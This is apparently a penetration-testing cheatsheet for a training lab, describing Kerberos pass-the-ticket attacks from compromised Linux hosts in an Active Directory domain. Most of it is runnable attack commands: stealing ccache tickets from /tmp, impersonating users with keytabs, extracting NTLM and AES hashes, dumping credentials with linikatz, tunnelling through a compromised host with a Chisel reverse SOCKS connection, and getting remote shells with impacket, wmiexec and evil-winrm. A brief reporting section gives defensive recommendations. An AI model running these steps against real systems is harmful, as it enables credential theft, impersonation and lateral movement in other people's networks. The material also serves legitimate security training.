π‘οΈ Methodology Checklist
- Locate or extract ccache ticket (
.ccachefile orKRB5CCNAMEenv var) - Import ticket:
export KRB5CCNAME=/path/to/ticket.ccache - Verify:
klist - Ensure
/etc/hostsmaps DC FQDN to IP - Use Impacket tools with
-k -no-pass: psexec, wmiexec, smbclient - Convert ccache β kirbi if needed:
impacket-ticketConverter - Debug double-hop issues: check for delegation or use
/etc/krb5.conf
π― Operational Context
Use when: Kerberos ticket obtained from Linux pivot β use ccache file for authentication to additional services without knowing passwords.
Think Dumber First: export KRB5CCNAME=/path/to/ticket.ccache then impacket-psexec -k -no-pass [DOMAIN]/[USER]@[TARGET]. The ticket in the ccache file authenticates the connection. No hash, no password β just the ticket.
Skip when: Ticket has expired (default 10-hour TGT lifetime) β request a new ticket or pivot to PtH instead.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
realm list | Check if Linux host is domain-joined |
ps -ef | grep -i "winbind|sssd" | Identify AD integration service |
find / -name *keytab* -ls 2>/dev/null | Find keytab files on filesystem |
crontab -l | Check cronjobs for kinit/keytab usage |
env | grep -i krb5 | Find current ticket via environment variable |
ls -la /tmp | List ccache ticket files in /tmp |
klist -k -t /opt/[FILE].keytab | Inspect keytab contents and principal name |
kinit [USER]@[DOMAIN] -k -t /opt/[FILE].keytab | Impersonate user using keytab |
smbclient //[DC]/[SHARE] -k -c ls | Access SMB share using active Kerberos ticket |
python3 /opt/keytabextract.py [FILE].keytab | Extract NTLM/AES hashes from keytab |
cp /tmp/krb5cc_[ID] . | Copy ccache ticket (requires root/owner) |
export KRB5CCNAME=/root/krb5cc_[ID] | Set active ticket path |
klist | Verify active ticket |
smbclient //dc01/C$ -k -c ls -no-pass | Use ccache ticket to access DC share |
impacket-ticketConverter ticket.ccache ticket.kirbi | Convert Linux ccache to Windows kirbi |
impacket-ticketConverter ticket.kirbi ticket.ccache | Convert Windows kirbi to Linux ccache |
proxychains impacket-wmiexec dc01 -k -no-pass | WMI exec through proxy using Kerberos ticket |
proxychains evil-winrm -i dc01 -r [DOMAIN] | Evil-WinRM through proxy using Kerberos |
bash linikatz.sh | Automated credential dump from Linux AD host (root required) |
π¬ Deep Dive & Workflow
Linux AD Integration β Two Credential Types
ccache files β live Kerberos tickets cached in /tmp
- Format:
krb5cc_[UID]_[RANDOM] - Location defined by
$KRB5CCNAMEenvironment variable - Can be stolen if you have root or file owner access
Keytab files β pre-shared keys for non-interactive authentication
- Used by service accounts and cron jobs to authenticate without user interaction
- If readable, can be used directly for
kinitor to extract hashes
Keytab Exploitation
# 1. Inspect: note the exact principal name (case-sensitive!)
klist -k -t /opt/specialfiles/carlos.keytab
# 2. Impersonate
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
# 3. Verify and use
klist
smbclient //dc01/carlos -k -c lsAlternatively, extract the hash and crack/reuse offline:
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
# Outputs: NTLM hash, AES128, AES256ccache Ticket Theft
# Find tickets
ls -la /tmp
env | grep -i krb5
# Steal (requires root or owner)
cp /tmp/krb5cc_647401106_I8I133 /root/stolen.ccache
export KRB5CCNAME=/root/stolen.ccache
klist
# Use
smbclient //dc01/C$ -k -c ls -no-passRemote Attack via Pivot (Chisel + Proxychains)
When attacking through a compromised Linux host from your own machine:
# 1. /etc/hosts β map DC hostname
172.16.1.10 dc01.inlanefreight.htb inlanefreight.htb
# 2. /etc/proxychains.conf
socks5 127.0.0.1 1080
# 3. Chisel tunnel
./chisel server --reverse --port 8080 # attacker
./chisel client [LHOST]:8080 R:socks # compromised host
# 4. /etc/krb5.conf
[libdefaults]
default_realm = INLANEFREIGHT.HTB
[realms]
INLANEFREIGHT.HTB = { kdc = dc01.inlanefreight.htb }
# 5. Execute
export KRB5CCNAME=/home/kali/stolen.ccache
proxychains impacket-wmiexec dc01 -k -no-pass
proxychains evil-winrm -i dc01 -r inlanefreight.htbπ οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| impacket-psexec returns βClock skew too greatβ | Kerberos time sync required | ntpdate -u [DC_IP] or timedatectl set-ntp true; must be within 5 minutes of DC |
| ccache ticket not found | Wrong KRB5CCNAME path | Verify: ls -la /tmp/krb5* or ls /tmp/krb5cc_*; use absolute path in KRB5CCNAME |
| Ticket works for psexec but not wmiexec | SPN availability | Try impacket-wmiexec -k -no-pass; some services require different SPN in ticket |
| Ticket from Windows format (.kirbi) | Need ccache format | Convert: impacket-ticketConverter ticket.kirbi ticket.ccache |
| Ticket valid but target returns access denied | Ticket not for this service | Service tickets are service-specific; you need a TGT to request new service tickets |
π Reporting Trigger
Finding Title: Kerberos Ticket Reuse Enables Lateral Movement Without Credentials Impact: Stolen or forged Kerberos tickets allow authentication to domain services as the ticket owner without knowing the account password, enabling lateral movement that bypasses credential-based controls and leaves minimal authentication logs. Root Cause: Kerberos tickets accessible in memory or ccache files with insufficient access controls. No behavioral monitoring for ticket-based authentication anomalies. Recommendation: Implement Microsoft Defender for Identity to detect abnormal ticket usage patterns. Reduce ticket lifetime (default 10 hours) for privileged accounts. Implement PAC validation. Monitor for ccache files in non-standard locations.